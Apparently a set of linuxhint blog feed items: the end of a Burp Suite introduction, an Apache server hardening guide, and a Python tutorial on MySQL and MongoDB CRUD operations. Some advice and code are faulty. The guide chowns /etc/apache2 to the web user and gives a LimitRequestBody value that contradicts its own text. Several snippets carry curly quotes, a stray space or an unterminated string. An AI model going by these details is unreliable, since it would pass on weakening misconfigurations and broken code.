Burp is an extremely powerful & rich-featured tool whose one of its awesome functions and features is to automate the attacks and find vulnerabilities, which makes life way easier for a pentester or a bug bounty hunter. Tasks that can take days manually can be done in the least bit of time using Burp, and it also provides an easy graphical user interface to launch Brute force attacks with or without a dictionary, just by making one’s word list right at the moment. On the other hand, the BApp store provides extremely powerful extensions that even further enhances the capabilities of Burp Suite. ]]> How to Secure Your Apache Server https://linuxhint.com/secure_apache_server/ Fri, 06 Nov 2020 03:14:35 +0000 https://linuxhint.com/?p=75701 Apache is a popular, open-source web server available for both Linux and Windows systems. It allows configuration for a diverse range of use cases, from HTML webpages to HyperText Preprocessor (PHP) dynamic web application content.Apache provides a secure and robust platform to deploy your web applications. However, it is still important to install the latest security patches and configure the server properly to establish a secure environment for your web applications.
In this article, you will find some tips and tricks to strengthen your Apache Web Server configurations and improve the general security.

Non-Privileged User Account

The purpose of a non-root or unprivileged user account is to restrict the user from unnecessary access to certain tasks within a system. In the context of an Apache web server, this means that it should work in a restricted environment with only the necessary permissions. By default, Apache runs with daemon account privileges. You can create a separate non-root user account to avoid threats in case of security vulnerabilities.

Furthermore, if apache2 and MySQL are under the same user credentials, any issue in the process of once service will have an impact on the other. To change the user and group privileges for the web server, go to /etc/apache2, open the file envvars, and set the user and group to a new non-privileged account user, say, “apache,” and save the file.

ubuntu@ubuntu~:$ sudo vim /etc/apache2/envvars
...snip...
export APACHE_RUN_USER= apache
export APACHE_RUN_GROUP= apache
...snip...

You can also use the following command to change the ownership of the installation directory to the new non-root user.

ubuntu@ubuntu~:$ sudo chown -R apache:apache /etc/apache2
Issue the following command to save the changes:
ubuntu@ubuntu~:$ sudo service apache2 restart

Keep Apache Up to Date

Apache is famous for providing a secure platform with a highly concerned developer community that rarely faces any security bugs. Nevertheless, it is normal to discover issues once the software is released. Hence, it is essential to keep the web server up to date to avail the latest security features. It is also advised to follow the Apache Server Announcement Lists to keep yourself updated about new announcements, releases, and security updates from the Apache development community.

To update your apache using apt, type the following:

ubuntu@ubuntu~:$ sudo apt-get update
ubuntu@ubuntu~:$ sudo apt-get upgrade

Disable Server Signature

The default configuration of an Apache Server exposes a lot of details about the server and its settings. For example, enabled ServerSignature and ServerTokens directives in the /etc/apache2/apache2.conf file add an additional header to the HTTP Response that exposes potentially sensitive information. This information includes server setting details, such as server version and hosting OS, that can help the attacker with the reconnaissance process. You can disable these directives by editing the apache2.conf file via vim/nano and add the following directive:

ubuntu@ubuntu~:$ sudo vim /etc/apache2/apache2.conf
...snip...
ServerSignature Off
...snip...
ServerTokens Prod
...snip...

Restart Apache to update the changes.

Disable Server Directory Listings

The Directory listings display all content saved in the root folder or sub-directories. The directory files can include sensitive information not intended for public display, such as PHP scripts, configuration files, files containing passwords, logs, etc.
To disallow directory listings, change the Apache server configuration file by editing the apache2.conf file as:

ubuntu@ubuntu~:$ sudo vim /etc/apache2/apache2.conf

...snip...

<Directory /var/www>

Options -Indexes

</Directory>

...snip...

OR

...snip...

<Directory /var/www/your_website>

Options -Indexes

</Directory>

...snip...

You can also add this directive in the .htaccess file of your main website directory.

Protect System Settings

The .htaccess file is a convenient and powerful feature that allows configuration outside the main apache2.conf file. However, in cases where a user can upload files to the server, this can be exploited by an attacker to upload his or her own “.htaccess” file with malicious configurations. So, if you are not using this feature, you can disable the .htaccess directive, i.e.:

ubuntu@ubuntu~:$ sudo vim /etc/apache2/apache2.conf
...snip...
#AccessFileName .htaccess
...snip...

OR
Disable the .htaccess file except for the specifically enabled directories by editing apache2.conf file and turning AllowOverRide directive to None;

ubuntu@ubuntu~:$ sudo vim /etc/apache2/apache2.conf

...snip...

<Directory '/'>

AllowOverride None

</Directory>

...snip...

Secure Directories with Authentication

You can create user credentials to protect all or some of the directories using the htpasswd utility. Go to your server folder and use the following command to create a .htpasswd file to store password hashes for the credentials assigned to, say, a user named dev.

ubuntu@ubuntu~:$ sudo htpasswd -c /etc/apache2/-htpasswd dev

The above command will ask for the new password and password confirmation. You can view the cat ./htpasswd file to check the hash for the stored user credentials.

Now, you can automatically set the configuration file in the your_website directory you need to protect by modifying the .htaccess file. Use the following command and directives to enable authentication:

ubuntu@ubuntu~:$ sudo nano /var/www/your_website/.htaccess
...snip...
AuthType Basic
AuthName "Add the Dialog Prompt"
AuthUserFile /etc/apache2/user_name/domain_name/.htpasswd
Require valid-user
...snip...

Remember to add the path as per yours.

Run Necessary Modules

The default Apache configuration includes enabled modules that you may not even need. These pre-installed modules open doors for Apache security issues that either already exist or can exist in the future. To disable all these modules, you first need to understand which modules are required for the smooth functioning of your web server. For this purpose, check out the apache module documentation that covers all available modules.

Next, use the following command to figure out which modules are running on your server.

ubuntu@ubuntu~:$ sudo ls /etc/apache2/mods-enabled

Apache comes with the powerful a2dismod command to disable the module. It prevents loading the module and prompts you with a warning when disabling the module that the action can negatively impact your server.

ubuntu@ubuntu~:$ sudo a2dismod module_name

You can also disable the module by commenting in the LoadModule line.

Prevent Slow Loris and DoS Attack

The default installation of an Apache server forces it to wait for requests from clients for too long, which subjects the server to Slow Loris and DoS attacks. The apache2.conf configuration file provides a directive that you can use to lower the timeout value to a few seconds to prevent these types of attacks, i.e.:

ubuntu@ubuntu~:$ sudo vim /etc/apache2/apache2.conf
Timeout 60

Besides, the new Apache server comes with a handy module mod_reqtimeout that provides a directive RequestReadTimeout to secure the server from illegitimate requests. This directive comes with a few tricky configurations, so you can read out the related information available on the documentation page.

Disable Unnecessary HTTP Requests

Unlimited HTTP/HTTPS requests can also lead to low server performance or a DoS attack. You can limit receiving HTTP requests per-directory by using LimitRequestBody to less than 100K. For instance, to create a directive for the folder /var/www/your_website, you can add the LimitRequestBody directive below AllowOverride All, i.e.:

...snip...

<Directory /var/www/your_website>

Options -Indexes

AllowOverride All

LimitRequestBody 995367

</Directory>

...snip...

Note: Remember to restart Apache after the applied changes to update it accordingly.

Conclusion

The default installation of the Apache server can supply plenty of sensitive information to aid attackers in an attack. In the meantime, there are plenty of other ways (not listed above) to secure the Apache web server, as well. Continue researching and keeping yourself updated about new directives and modules to secure your server further.

]]>
CRUD Operations to SQL and NoSQL Databases using Python https://linuxhint.com/crud_operations_python/ Sun, 01 Nov 2020 06:52:53 +0000 https://linuxhint.com/?p=74895 There are two major types of databases that can be used with an application: relational databases (SQL) and non-relational databases (NoSQL). Both are widely used but selecting one depends on the type of data that will be stored. There are four basic operations that can be performed on databases: create, read, update and delete (CRUD).

We can interact with databases using any programming language, or we can use a software program that allow us to interact with the database using a GUI. In this article, we will discuss databases and show you how to interact with them using the Python programming language.

Relational Databases (SQL)

Relational databases (SQL) are different from non-relational databases (NoSQL) in terms of schema. A schema is a template that defines the structure of the data you are going to store. In relational databases, we create tables to store data. The schema of a table is defined when the table is created. For example, if we want to store data on students in a relational database, then we will create a table of students and define the schema of the table, which might include the name, registration number, grade, etc. of each student. After creating the schema, we will store the data in the rows of the table. It is important to note that we cannot store data that is not defined in the schema. In this example, the grade a student received on an exam cannot be stored in the table because we have not defined a column for these data in the schema.

The following list includes some popular relational databases:

  • MariaDB
  • MySQL
  • SQL Server
  • PostgreSQL
  • Oracle

Non-Relational Databases (NoSQL)

As discussed above, non-relational databases do not have a defined schema. Non-relational databases have collections instead of tables, and these collections contain documents that are equivalent to the rows in a relational database. For example, if we want to create a non-relational database to store student data, we can create a collection of users and, in this collection, we will store a document for each student. These documents do not have a defined schema, and you can store anything you want for each student.

Performing CRUD Operations in MySQL

Now, we will show you how to interact with MySQL using Python.

Installing MySQL Driver for Python

To interact with MySQL using Python, we first need to install MySQL driver in Python.

ubuntu@ubuntu:~$ sudo pip3 install mysql-connector-python

or

ubuntu@ubuntu:~$ sudo pip install mysql-connector-python

Creating a Database

Before creating a database, we need to connect with MySQL server using Python. The mysql.connector module offers the connect() method to help to establish a connection with MySQL using Python.

>>> import mysql.connector
//Replace with your own IP and Server Credentials
>>> sql = mysql.connector.connect(
... host='localhost',
... user='root',
... password='12345'
... )
>>> print(sql)
<mysql.connector.connection_cext.CMySQLConnection object at 0x7fccb1190a58>

This message shows that we have successfully created a connection with a MySQL database using Python. Now, we will run an SQL query on MySQL server using the execute() method from the mysql.connector module.

>>> cursor = sql.cursor()
>>> query = ‘CREATE DATABASE demo_db’
>>> cursor.execute(query)

The above code will create a database named demo_db in MySQL.

Creating a Table

Now that we have created a database, we will create a new table named students. To create a table, we need to connect to the database.

>>> sql_db = mysql.connector.connect(
... host='localhost',
... user='root',
... password='12345',
... database='demo_db'
... )

After connecting to the database, we will use the execute() method to run an SQL query to create a table with a schema.

>>> query = "CREATE TABLE students(name VARCHAR(64), id INT, grade INT, dob DATE)";
>>> cursor.execute(query);

The above command will create a table named students in the demo_db database; we can insert only a name, id, grade and date of birth in the table, as defined in schema.

Inserting Rows into a Table

Now that we have created a table, we will insert a student in this table. We will create a query and then use the execute() method to run the query on MySQL server using Python.

>>> query = 'INSERT INTO students(name, id, grade, dob) VALUES(“John”, 1, 3, “2020-7-04”)'
>>> cursor.execute(query)
>>> sql_db.commit()

This query will add a student with the data defined in the query into the table. We can add additional students to the table in the same way.

NOTE: Changes will be applied to the database only if you run sql_db.commit() after applying changes.

Selecting Rows from a Table

The SELECT statement in MySQL is used to return data from a table. We will use the execute() method to run a query, and then we will use the fetchall() method to get a list of all students. Then, we can use a for loop to display all the students

>>> query = ‘SELECT * FROM students’
>>> cursor.execute(query)
>>> result = cursor.fetchall()
>>> for x in result:
...     print(x)
('John', 1, 3, datetime.date(2020, 7, 4))

We can see that only data for a single student data are returned, as we have only one student in the table. We can use the WHERE statement in MySQL with the SELECT statement to specify constraints. For example, if we want to return the students in grade 4 only, we can use the following query:

>>> query = ‘SELECT * FROM students WHERE grade = 4
>>> cursor.execute(query)
>>> result = cursor.fetchall()
>>> for x in result:
...    print(x)

The above code will fetch only the students from grade 4.

Updating a Row

In this section, we will show you how to update the student data in a MySQL table using Python. We will use the UPDATE statement with the WHERE and SET statements in MySQL to update the data of specific students. The WHERE statement is used to determine which rows will be updated, and the SET statement is used to defines the values used for the update.

>>> query = 'UPDATE students SET name="Mark" WHERE id = 4'
>>> cursor.execute(query)
>>> sql_db.commit()

Now, we will try to read the student data from the table by using the SELECT statement.

>>> query = 'SELECT * FROM students WHERE id=4'
>>> cursor.execute(query)
>>> for x in cursor:
...     print(x)
('Mark', 4, 4, datetime.date(2020, 7, 15))

Now, we can see that the name of the student with id 4 has been changed to Mark.

Deleting a Row

We can delete a row from the table by applying the DELETE statement in MySQL using Python. We will use a DELETE statement with a WHERE statement to delete specific students from the table.

>>> query = 'DELETE FROM students WHERE id=2'
>>> cursor.execute(query)
>>> sql_db.commit()

Now, we can return all the students from the table using the SELECT statement.

>>> query = 'SELECT * FROM students'
>>> cursor.execute(query)
>>> for x in cursor:
...     print(x)
('John', 1, 3, datetime.date(2020, 7, 4))
('John', 3, 3, datetime.date(2020, 7, 8))
('Mark', 4, 4, datetime.date(2020, 7, 15))

We can see that the table does not contain a student with an id of 2, as we have removed the student from the table.

Dropping a Table

The mysql.connector module can also be used to drop a table. We can execute a DROP statement in MySQL by using the execute() method.

>>> cursor = sql_db.cursor()
>>> query = 'DROP TABLE students'
>>> cursor.execute(query)

The above code will delete the table named students when executed in Python.

That concludes our discussion of SQL databases. We have showed you how to apply different queries to the MySQL database using Python. Next, we will apply CRUD operations to a NoSQL Database called MongoDB

Performing CRUD Operations in MongoDB

To interact with MongoDB using Python, we must first install pymongo, which is a MongoDB driver for Python.

ubuntu@ubuntu:~$ sudo pip install pymongo

or

ubuntu@ubuntu:~$ sudo pip3 install pymongo

Creating a Database

We can connect to MongoDB using the MongoClient() method of the pymongo module in MongoDB. Before performing any actions, we need to connect to the MongoDB database.

>>> import pymongo
>>> client = pymongo.MongoClient('mongodb://localhost:27017/')

After connecting to the datacase, we can execute the following line to create a new database named demo_db.

>>> db = client['demo_db']

If the database already exists, then this command is ignored.

Creating a Collection

Now that we have created a database, we will create a collection named students in the database named.

>>> import pymongo
>>> client = pymongo.MongoClient('mongodb://localhost:27017/')
>>> db = client['demo_db']
>>> col = db['students']

NOTE: MongoDB does not create a collection until you enter data in it. Therefore, if you try to access the collection after running the above code, you will find that there is nothing in the database.

Unlined MySQL, we do not have to define a schema when we create a new collection, as MongoDB is a non-relational database.

Inserting a Document

After creating a collection, we can insert a document inside the collection. First, we must define a dictionary, and then we can use the insert_one() method to insert the data defined in the dictionary into the collection.

NOTE: MongoDB automatically creates a unique ‘_id’ for each document; therefore, we do not need to specify an id.

>>> data = {
... "name": "John",
... "grade": 3,
... "dob": "2020-04-03"
... }
>>> result = col.insert_one(data)

In the above document, we inserted name, grade and dob. Now, we will insert a document in the students collection that has a field for age.

>>> data = {
... "name" : "Mark",
... "grade": 4,
... "dob": "2020-04-09",
... "age" : 8
... }
>>> result = col.insert_one(data)

We can see that this command does not throw an error. Because MongoDB is a non-relational database, we can add any information we want in the document.

Getting Documents

In this section, we will use the find() and find_one() methods to get data from the database. The find() method takes two arguments: the first is used to filter documents, and the second is used to define the fields of the document we want to return. For example, if we want to get the id of ‘John,’ then we can run the following query:

>>> result = col.find({"name": "John"}, {"_id": 1})
>>> for x in result:
...     print(x)
{'_id': ObjectId('5f8f0514cb12c01f7420656e')}

Alternatively, we can get all the documents from the collection by using the following query:

>>> result = col.find()
>>> for x in result:
...     print(x)
{'_id': ObjectId('5f8f0514cb12c01f7420656e'), 'name': 'John', 'grade': 3, 'dob': '2020-04-03'}
{'_id': ObjectId('5f8f061ccb12c01f7420656f'), 'name': 'Mark', 'grade': 4, 'dob': '2020-04-09', 'age': 8}

Updating Documents

The pymongo module offers the update_one() and update_many() methods for updating the documents in a collection. Both methods take two arguments: the first defines which document to change, and the second defines the new values. Now, we will change the grade of the student ‘Mark’.

>>> query = {"name": "Mark"}
>>> value = {"$set": {"grade": 5}}
>>> col.update_one(query, value)

>>> for x in col.find():
...     print(x)
{'_id': ObjectId('5f8f0514cb12c01f7420656e'), 'name': 'John', 'grade': 3, 'dob': '2020-04-03'}
{'_id': ObjectId('5f8f061ccb12c01f7420656f'), 'name': 'Mark', 'grade': 5, 'dob': '2020-04-09', 'age': 8}

Deleting a Document

The pymongo module in Python has two methods, i.e., delete_one() and delete_many(), for deleting documents. Both methods take an argument that selects the document to delete. With the following code, we will delete a student named ‘John’.

>>> query = {"name": "John"}
>>> col.delete_one(query)

>>> for x in col.find():
...     print(x)
{'_id': ObjectId('5f8f061ccb12c01f7420656f'), 'name': 'Mark', 'id': 2, 'grade': 5, 'dob': '2020-04-09', 'age': 8}

Dropping a Collection

We can drop a collection in MongoDB by using the drop() method of the pymongo module in Python. First, we need to connect to the database; then, we select the database that holds the collection we want to remove. After selecting the collection from the database, we can remove the collection using the drop() method. The following code will drop students.

>>> import pymongo
>>> client = pymongo.MongoClient('mongodb://localhost:27017/')
>>> db = client['demo_db']
>>> col = db['students']
>>> col.drop()

Conclusion

Knowledge of databases is essential if you want to make a web application. Almost every programming language has frameworks and libraries for backend web development. Python can be used in backend web development, and so we can interact with databases using Python while working with Python backend frameworks. In this article, we showed you how to interact with MongoDB and MySQL databases by using simple CRUD operations written in Python.

]]>